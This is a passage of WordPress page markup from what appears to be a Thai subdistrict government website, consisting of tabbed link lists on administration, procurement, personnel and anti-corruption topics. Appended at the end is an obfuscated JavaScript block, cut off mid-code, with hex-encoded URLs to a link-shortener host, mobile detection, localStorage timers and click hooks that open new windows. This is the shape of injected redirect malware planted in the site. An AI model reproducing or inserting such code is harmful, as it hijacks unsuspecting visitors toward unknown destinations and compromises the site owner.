kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม  No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f729cb-3e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f729cb-3e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_893939-da\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_893939-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 